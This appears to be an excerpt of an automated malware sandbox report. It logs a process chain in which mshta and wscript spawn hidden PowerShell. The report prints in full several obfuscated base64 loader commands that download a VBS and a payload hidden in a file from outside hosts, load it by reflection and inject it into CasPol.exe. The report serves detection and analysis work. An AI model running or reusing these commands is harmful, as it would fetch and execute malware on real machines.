                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00433CD7 SetUnhandledExceptionFilter,13_2_00433CD7

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Source: Yara matchFile source: amsi32_7492.amsi.csv, type: OTHER
                    Source: Yara matchFile source: amsi32_8032.amsi.csv, type: OTHER
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 8032, type: MEMORYSTR
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnMmtkaW1hZycrJ2VVcmwgPSBlQzRodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlLycrJ2dldD9maWxla2V5PXMnKydoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtJysnZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBlQzQ7Mmtkd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDsya2RpbWFnZUJ5dGVzID0gMmtkd2ViQ2xpZW50LkRvdycrJ24nKydsb2FkRGF0YSgya2RpbWFnZVVybCk7MmtkaW1hZ2VUZXh0ID0gJysnW1N5c3RlbS5UZScrJ3h0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoMmtkaW1hZ2VCeXRlcycrJyk7Mmtkc3RhcnRGbGFnID0gZUM0PDxCQVNFNjRfU1RBUlQ+PmVDJysnNDsya2RlbmRGbGFnID0gZUM0PDxCQVNFNjRfRU5EPj5lQzQ7Mmtkc3RhcnRJbmRleCA9IDJrZGltYWdlVGV4dC5JbmRleE9mKDJrZHN0YXJ0RmxhZyk7MmtkZScrJ24nKydkSW5kZXggPSAya2RpbWFnZVRleHQuSW5kZXgnKydPZigya2RlbmRGbGEnKydnKTsya2RzdGFydEluZGV4IC1nZSAwIC1hbmQgMmtkZW5kSW5kZXggLWd0IDJrZHN0YXInKyd0SW5kZXg7Mmtkc3RhcnRJbmRleCArPSAya2RzdGFydEZsYWcuTGVuZ3QnKydoOzJrZGJhc2U2NExlbmd0aCA9IDJrZGVuZEluZGV4IC0gMmtkc3RhcnRJbmRleDsya2RiYXNlNjRDb21tYW5kID0gMmsnKydkaW1hZ2VUJysnZXh0LlN1YnN0cmluZygya2RzdGFydEluZGV4LCAya2RiYXNlNjRMZW5ndGgpOzJrZGJhc2U2NFJlJysndmVyc2VkID0gLWpvaW4gKDJrZGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBzeVYgRm9yRWFjaC1PYmplY3QgeyAya2RfIH0pWy0xLi4tKDJrZGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07MmtkY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhcycrJ2U2NFN0cmluZygya2RiYXNlNjRSZXZlcnNlZCk7MmtkbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKDJrZGNvbW1hbmRCeXRlcyk7MmtkdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChlQzRWQUllQzQpOzJrZHZhaU1ldGhvZC5JbnZva2UoJysnMmtkbnVsbCwgQChlQzR0eHQuRkdWR0ZSLzIyNDEvNjIuNjQuOCcrJzYxLjQwMS8vOnB0dGhlQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsJysnIGVDNENhc1BvbGVDNCwgZUM0ZGVzYXRpdmFkb2VDNCwgZUM0ZGVzYXRpdmFkb2VDNCxlQycrJzRkZXNhdGl2YWRvJysnZUM0LGVDNGRlc2F0aScrJ3ZhZG9lQzQsZUM0ZGVzYXRpdmFkb2VDNCxlQzRkZXNhdGl2YWRvZUM0LGVDNGRlc2F0aXZhZG9lQycrJzQsZUM0MWVDNCxlQzRkZXNhdGl2YWRvZUM0KSk7JykgIC1jcmVwbEFDZSAgKFtjaEFSXTExNStbY2hBUl0xMjErW2NoQVJdODYpLFtjaEFSXTEyNCAgLVJlUExBY2UgIChbY2hBUl01MCtbY2hBUl0xMDcrW2NoQVJdMTAwKSxbY2hBUl0zNiAtY3JlcGxBQ2UnZUM0JyxbY2hBUl0zOSl8IC4oKGd2ICcqTURyKicpLk5BTWVbMywxMSwyXS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000 value starts with: 4D5AJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 400000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 401000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 457000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 470000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 476000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: 47B000Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe base: AFE008Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe13_2_00410F36
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 13_2_00418754 mouse_event,13_2_00418754
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysTEm32\WInDowSpoWeRShell\V1.0\POwersheLL.exE" "powErsHEll.eXE -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENt ; IeX($(iEX('[SYsTem.tExT.EnCoDINg]'+[ChAR]0x3a+[ChaR]0x3a+'utF8.GeTSTrING([SystEM.cOnvERt]'+[CHAR]0x3a+[cHAR]58+'FrOMbASe64STrING('+[CHAr]34+'JFM1UFpiNiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVHlwZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NRW1iZVJERUZpTkl0aU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTE1PTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhwSGhsTndBLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFRSdEdKUEJ0ZSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaEFVYVRQUSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBjTWFReEFTWWhsSyk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgInhaQm5VRSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRXNQYWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ0NzVWlPTklmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRTNVBaYjY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xMDQuMTY4LjQ2LjI2LzE0MjIvYmVzdG9mdGhpbmdzd2l0aGVudGlyZXRpbWVnaXZlbmVic3R0aGlnbnN0b2Rvd2l0aGdyZWF0LnRJRiIsIiRFblY6QVBQREFUQVxiZXN0b2Z0aGluZ3N3aXRoZW50aXJldGltZWdpdmVuZWJzdHRoaWduc3RvZG93aXRoZy52QnMiLDAsMCk7U3RhclQtc2xFRVAoMyk7SWkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXGJlc3RvZnRoaW5nc3dpdGhlbnRpcmV0aW1lZ2l2ZW5lYnN0dGhpZ25zdG9kb3dpdGhnLnZCcyI='+[cHaR]0x22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpaSs -noP -W 1 -C dEViCEcReDEntIaLDEployMENtJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\blaytqul\blaytqul.cmdline"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\bestofthingswithentiretimegivenebstthignstodowithg.vBs" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF818.tmp" "c:\Users\user\AppData\Local\Temp\blaytqul\CSC6824B6AE21FF4F1D9A4E95662E7FF991.TMP"Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnMmtkaW1hZycrJ2VVcmwgPSBlQzRodHRwczovLzMxMDUuZmlsZW1haWwuY29tL2FwaS9maWxlLycrJ2dldD9maWxla2V5PXMnKydoVFBIYkNQWDhvLWxPdENxSExHNl8weEN5LXhsNHRueGxBVmJROTUtJysnZHZpVEs1Y0FSYU5kUWpiYjNtZXhmd1F6S21UWGcmc2tpcHJlZz10cnVlJnBrX3ZpZD1lMDEwOTYzOGM5YmZiOTU3MTczMjUzMTMwOWI1ZmY3YyBlQzQ7Mmtkd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDsya2RpbWFnZUJ5dGVzID0gMmtkd2ViQ2xpZW50LkRvdycrJ24nKydsb2FkRGF0YSgya2RpbWFnZVVybCk7MmtkaW1hZ2VUZXh0ID0gJysnW1N5c3RlbS5UZScrJ3h0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoMmtkaW1hZ2VCeXRlcycrJyk7Mmtkc3RhcnRGbGFnID0gZUM0PDxCQVNFNjRfU1RBUlQ+PmVDJysnNDsya2RlbmRGbGFnID0gZUM0PDxCQVNFNjRfRU5EPj5lQzQ7Mmtkc3RhcnRJbmRleCA9IDJrZGltYWdlVGV4dC5JbmRleE9mKDJrZHN0YXJ0RmxhZyk7MmtkZScrJ24nKydkSW5kZXggPSAya2RpbWFnZVRleHQuSW5kZXgnKydPZigya2RlbmRGbGEnKydnKTsya2RzdGFydEluZGV4IC1nZSAwIC1hbmQgMmtkZW5kSW5kZXggLWd0IDJrZHN0YXInKyd0SW5kZXg7Mmtkc3RhcnRJbmRleCArPSAya2RzdGFydEZsYWcuTGVuZ3QnKydoOzJrZGJhc2U2NExlbmd0aCA9IDJrZGVuZEluZGV4IC0gMmtkc3RhcnRJbmRleDsya2RiYXNlNjRDb21tYW5kID0gMmsnKydkaW1hZ2VUJysnZXh0LlN1YnN0cmluZygya2RzdGFydEluZGV4LCAya2RiYXNlNjRMZW5ndGgpOzJrZGJhc2U2NFJlJysndmVyc2VkID0gLWpvaW4gKDJrZGJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBzeVYgRm9yRWFjaC1PYmplY3QgeyAya2RfIH0pWy0xLi4tKDJrZGJhc2U2NENvbW1hbmQuTGVuZ3RoKV07MmtkY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhcycrJ2U2NFN0cmluZygya2RiYXNlNjRSZXZlcnNlZCk7MmtkbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKDJrZGNvbW1hbmRCeXRlcyk7MmtkdmFpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZChlQzRWQUllQzQpOzJrZHZhaU1ldGhvZC5JbnZva2UoJysnMmtkbnVsbCwgQChlQzR0eHQuRkdWR0ZSLzIyNDEvNjIuNjQuOCcrJzYxLjQwMS8vOnB0dGhlQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsIGVDNGRlc2F0aXZhZG9lQzQsJysnIGVDNENhc1BvbGVDNCwgZUM0ZGVzYXRpdmFkb2VDNCwgZUM0ZGVzYXRpdmFkb2VDNCxlQycrJzRkZXNhdGl2YWRvJysnZUM0LGVDNGRlc2F0aScrJ3ZhZG9lQzQsZUM0ZGVzYXRpdmFkb2VDNCxlQzRkZXNhdGl2YWRvZUM0LGVDNGRlc2F0aXZhZG9lQycrJzQsZUM0MWVDNCxlQzRkZXNhdGl2YWRvZUM0KSk7JykgIC1jcmVwbEFDZSAgKFtjaEFSXTExNStbY2hBUl0xMjErW2NoQVJdODYpLFtjaEFSXTEyNCAgLVJlUExBY2UgIChbY2hBUl01MCtbY2hBUl0xMDcrW2NoQVJdMTAwKSxbY2hBUl0zNiAtY3JlcGxBQ2UnZUM0JyxbY2hBUl0zOSl8IC4oKGd2ICcqTURyKicpLk5BTWVbMywxMSwyXS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('2kdimag'+'eUrl = eC4https://3105.filemail.com/api/file/'+'get?filekey=s'+'hTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-'+'dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c eC4;2kdwebClient = New-Object System.Net.WebClient;2kdimageBytes = 2kdwebClient.Dow'+'n'+'loadData(2kdimageUrl);2kdimageText = '+'[System.Te'+'xt.Encoding]::UTF8.GetString(2kdimageBytes'+');2kdstartFlag = eC4<<BASE64_START>>eC'+'4;2kdendFlag = eC4<<BASE64_END>>eC4;2kdstartIndex = 2kdimageText.IndexOf(2kdstartFlag);2kde'+'n'+'dIndex = 2kdimageText.Index'+'Of(2kdendFla'+'g);2kdstartIndex -ge 0 -and 2kdendIndex -gt 2kdstar'+'tIndex;2kdstartIndex += 2kdstartFlag.Lengt'+'h;2kdbase64Length = 2kdendIndex - 2kdstartIndex;2kdbase64Command = 2k'+'dimageT'+'ext.Substring(2kdstartIndex, 2kdbase64Length);2kdbase64Re'+'versed = -join (2kdbase64Command.ToCharArray() syV ForEach-Object { 2kd_ })[-1..-(2kdbase64Command.Length)];2kdcommandBytes = [System.Convert]::FromBas'+'e64String(2kdbase64Reversed);2kdloadedAssembly = [System.Reflection.Assembly]::Load(2kdcommandBytes);2kdvaiMethod = [dnlib.IO.Home].GetMethod(eC4VAIeC4);2kdvaiMethod.Invoke('+'2kdnull, @(eC4txt.FGVGFR/2241/62.64.8'+'61.401//:pttheC4, eC4desativadoeC4, eC4desativadoeC4, eC4desativadoeC4,'+' eC4CasPoleC4, eC4desativadoeC4, eC4desativadoeC4,eC'+'4desativado'+'eC4,eC4desati'+'vadoeC4,eC4desativadoeC4,eC4desativadoeC4,eC4desativadoeC'+'4,eC41eC4,eC4desativadoeC4));') -creplACe ([chAR]115+[chAR]121+[chAR]86),[chAR]124 -RePLAce ([chAR]50+[chAR]107+[chAR]100),[chAR]36 -creplACe'eC4',[chAR]39)| .((gv '*MDr*').NAMe[3,11,2]-jOiN'')"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jfm1ufpiniagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicbhzeqtvhlwzsagicagicagicagicagicagicagicagicagicagicagic1nrw1izvjeruzptkl0au9uicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvyte1pti5ebgwilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbalhn0cmluzyagicagicagicagicagicagicagicagicagicagicagighwsghstndblhn0cmluzyagicagicagicagicagicagicagicagicagicagicagifrsdedkuej0zsx1aw50icagicagicagicagicagicagicagicagicagicagicagaefvyvrqusxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbjtwfreeftwwhssyk7jyagicagicagicagicagicagicagicagicagicagicagic1oqu1ficagicagicagicagicagicagicagicagicagicagicaginhaqm5vrsigicagicagicagicagicagicagicagicagicagicagicattmfnrxnqywnlicagicagicagicagicagicagicagicagicagicagicagq0nzvwlptklmicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrtnvbayjy6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xmdqumty4ljq2lji2lze0mjivymvzdg9mdghpbmdzd2l0agvudglyzxrpbwvnaxzlbmvic3r0aglnbnn0b2rvd2l0agdyzwf0lnrjriisiirfbly6qvbqrefuqvxizxn0b2z0agluz3n3axrozw50axjldgltzwdpdmvuzwjzdhroawduc3rvzg93axrozy52qnmildasmck7u3rhclqtc2xfrvaomyk7swkgicagicagicagicagicagicagicagicagicagicagicaijgvuvjpbufbeqvrbxgjlc3rvznroaw5nc3dpdghlbnrpcmv0aw1lz2l2zw5lynn0dghpz25zdg9kb3dpdghnlnzccyi='+[char]0x22+'))')))"
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = 'kcgnmmtkaw1hzycrj2vvcmwgpsblqzrodhrwczovlzmxmduuzmlszw1hawwuy29tl2fwas9mawxllycrj2dldd9mawxla2v5pxmnkydovfbiyknqwdhvlwxpdenxsexhnl8ween5lxhsnhruegxbvmjrotutjysnzhzpves1y0fsyu5kuwpiyjntzxhmd1f6s21uwgcmc2tpchjlzz10cnvljnbrx3zpzd1lmdewotyzogm5ymziotu3mtczmjuzmtmwowi1zmy3yyblqzq7mmtkd2viq2xpzw50id0gtmv3lu9iamvjdcbtexn0zw0utmv0lldlyknsawvuddsya2rpbwfnzuj5dgvzid0gmmtkd2viq2xpzw50lkrvdycrj24nkydsb2fkrgf0ysgya2rpbwfnzvvybck7mmtkaw1hz2vuzxh0id0gjysnw1n5c3rlbs5uzscrj3h0lkvuy29kaw5nxto6vvrgoc5hzxrtdhjpbmcommtkaw1hz2vcexrlcycrjyk7mmtkc3rhcnrgbgfnid0gzum0pdxcqvnfnjrfu1rbulq+pmvdjysnndsya2rlbmrgbgfnid0gzum0pdxcqvnfnjrfru5epj5lqzq7mmtkc3rhcnrjbmrleca9idjrzgltywdlvgv4dc5jbmrlee9mkdjrzhn0yxj0rmxhzyk7mmtkzscrj24nkydksw5kzxggpsaya2rpbwfnzvrlehqusw5kzxgnkydpzigya2rlbmrgbgenkydnktsya2rzdgfydeluzgv4ic1nzsawic1hbmqgmmtkzw5ksw5kzxgglwd0idjrzhn0yxinkyd0sw5kzxg7mmtkc3rhcnrjbmrlecarpsaya2rzdgfydezsywcutgvuz3qnkydoozjrzgjhc2u2nexlbmd0aca9idjrzgvuzeluzgv4ic0gmmtkc3rhcnrjbmrledsya2riyxnlnjrdb21tyw5kid0gmmsnkydkaw1hz2vujysnzxh0lln1ynn0cmluzygya2rzdgfydeluzgv4lcaya2riyxnlnjrmzw5ndggpozjrzgjhc2u2nfjljysndmvyc2vkid0glwpvaw4gkdjrzgjhc2u2nenvbw1hbmquvg9dagfyqxjyyxkoksbzevygrm9yrwfjac1pymply3qgeyaya2rfih0pwy0xli4tkdjrzgjhc2u2nenvbw1hbmqutgvuz3rokv07mmtky29tbwfuzej5dgvzid0gw1n5c3rlbs5db252zxj0xto6rnjvbujhcycrj2u2nfn0cmluzygya2riyxnlnjrszxzlcnnlzck7mmtkbg9hzgvkqxnzzw1ibhkgpsbbu3lzdgvtlljlzmxly3rpb24uqxnzzw1ibhldojpmb2fkkdjrzgnvbw1hbmrcexrlcyk7mmtkdmfptwv0ag9kid0gw2rubglilklplkhvbwvdlkdlde1ldghvzchlqzrwqullqzqpozjrzhzhau1ldghvzc5jbnzva2uojysnmmtkbnvsbcwgqchlqzr0ehqurkdwr0zslziyndevnjiunjquoccrjzyxljqwms8vonb0dghlqzqsigvdngrlc2f0axzhzg9lqzqsigvdngrlc2f0axzhzg9lqzqsigvdngrlc2f0axzhzg9lqzqsjysnigvdnenhc1bvbgvdncwgzum0zgvzyxrpdmfkb2vdncwgzum0zgvzyxrpdmfkb2vdncxlqycrjzrkzxnhdgl2ywrvjysnzum0lgvdngrlc2f0ascrj3zhzg9lqzqszum0zgvzyxrpdmfkb2vdncxlqzrkzxnhdgl2ywrvzum0lgvdngrlc2f0axzhzg9lqycrjzqszum0mwvdncxlqzrkzxnhdgl2ywrvzum0ksk7jykgic1jcmvwbefdzsagkftjaefsxtexnstby2hbul0xmjerw2noqvjdodyplftjaefsxteyncaglvjluexby2ugichby2hbul01mctby2hbul0xmdcrw2noqvjdmtawksxby2hbul0zniaty3jlcgxbq2unzum0jyxby2hbul0zosl8ic4okgd2iccqturykicplk5btwvbmywxmswyxs1qt2lojycp';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "(('2kdimag'+'eurl = ec4https://3105.filemail.com/api/file/'+'get?filekey=s'+'htphbcpx8o-lotcqhlg6_0xcy-xl4tnxlavbq95-'+'dvitk5carandqjbb3mexfwqzkmtxg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c ec4;2kdwebclient = new-object system.net.webclient;2kdimagebytes = 2kdwebclient.dow'+'n'+'loaddata(2kdimageurl);2kdimagetext = '+'[system.te'+'xt.encoding]::utf8.getstring(2kdimagebytes'+');2kdstartflag = ec4<<base64_start>>ec'+'4;2kdendflag = ec4<<base64_end>>ec4;2kdstartindex = 2kdimagetext.indexof(2kdstartflag);2kde'+'n'+'dindex = 2kdimagetext.index'+'of(2kdendfla'+'g);2kdstartindex -ge 0 -and 2kdendindex -gt 2kdstar'+'tindex;2kdstartindex += 2kdstartflag.lengt'+'h;2kdbase64length = 2kdendindex - 2kdstartindex;2kdbase64command = 2k'+'dimaget'+'ext.substring(2kdstartindex, 2kdbase64length);2kdbase64re'+'versed = -join (2kdbase64command.tochararray() syv foreach-object { 2kd_ })[-1..-(2kdbase64command.length)];2kdcommandbytes = [system.convert]::frombas'+'e64string(2kdbase64reversed);2kdloadedassembly = [system.reflection.assembly]::load(2kdcommandbytes);2kdvaimethod = [dnlib.io.home].getmethod(ec4vaiec4);2kdvaimethod.invoke('+'2kdnull, @(ec4txt.fgvgfr/2241/62.64.8'+'61.401//:ptthec4, ec4desativadoec4, ec4desativadoec4, ec4desativadoec4,'+' ec4caspolec4, ec4desativadoec4, ec4desativadoec4,ec'+'4desativado'+'ec4,ec4desati'+'vadoec4,ec4desativadoec4,ec4desativadoec4,ec4desativadoec'+'4,ec41ec4,ec4desativadoec4));') -creplace ([char]115+[char]121+[char]86),[char]124 -replace ([char]50+[char]107+[char]100),[char]36 -creplace'ec4',[char]39)| .((gv '*mdr*').name[3,11,2]-join'')"
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "powershell.exe -ex bypass -nop -w 1 -c devicecredentialdeployment ; iex($(iex('[system.text.encoding]'+[char]0x3a+[char]0x3a+'utf8.getstring([system.convert]'+[char]0x3a+[char]58+'frombase64string('+[char]34+'jfm1ufpiniagicagicagicagicagicagicagicagicagicagicagid0gicagicagicagicagicagicagicagicagicagicagicbhzeqtvhlwzsagicagicagicagicagicagicagicagicagicagicagic1nrw1izvjeruzptkl0au9uicagicagicagicagicagicagicagicagicagicagicagj1tebgxjbxbvcnqoinvyte1pti5ebgwilcagicagicagicagicagicagicagicagicagicagicagienoyxjtzxqgpsbdagfyu2v0llvuawnvzgupxxb1ymxpyybzdgf0awmgzxh0zxjuieludfb0cibvukxeb3dubg9hzfrvrmlszshjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbalhn0cmluzyagicagicagicagicagicagicagicagicagicagicagighwsghstndblhn0cmluzyagicagicagicagicagicagicagicagicagicagicagifrsdedkuej0zsx1aw50icagicagicagicagicagicagicagicagicagicagicagaefvyvrqusxjbnrqdhigicagicagicagicagicagicagicagicagicagicagicbjtwfreeftwwhssyk7jyagicagicagicagicagicagicagicagicagicagicagic1oqu1ficagicagicagicagicagicagicagicagicagicagicaginhaqm5vrsigicagicagicagicagicagicagicagicagicagicagicattmfnrxnqywnlicagicagicagicagicagicagicagicagicagicagicagq0nzvwlptklmicagicagicagicagicagicagicagicagicagicagicaglvbhc3nuahj1oyagicagicagicagicagicagicagicagicagicagicagicrtnvbayjy6olvstervd25sb2fkvg9gawxlkdasimh0dha6ly8xmdqumty4ljq2lji2lze0mjivymvzdg9mdghpbmdzd2l0agvudglyzxrpbwvnaxzlbmvic3r0aglnbnn0b2rvd2l0agdyzwf0lnrjriisiirfbly6qvbqrefuqvxizxn0b2z0agluz3n3axrozw50axjldgltzwdpdmvuzwjzdhroawduc3rvzg93axrozy52qnmildasmck7u3rhclqtc2xfrvaomyk7swkgicagicagicagicagicagicagicagicagicagicagicaijgvuvjpbufbeqvrbxgjlc3rvznroaw5nc3dpdghlbnrpcmv0aw1lz2l2zw5lynn0dghpz25zdg9kb3dpdghnlnzccyi='+[char]0x22+'))')))"Jump to behavior
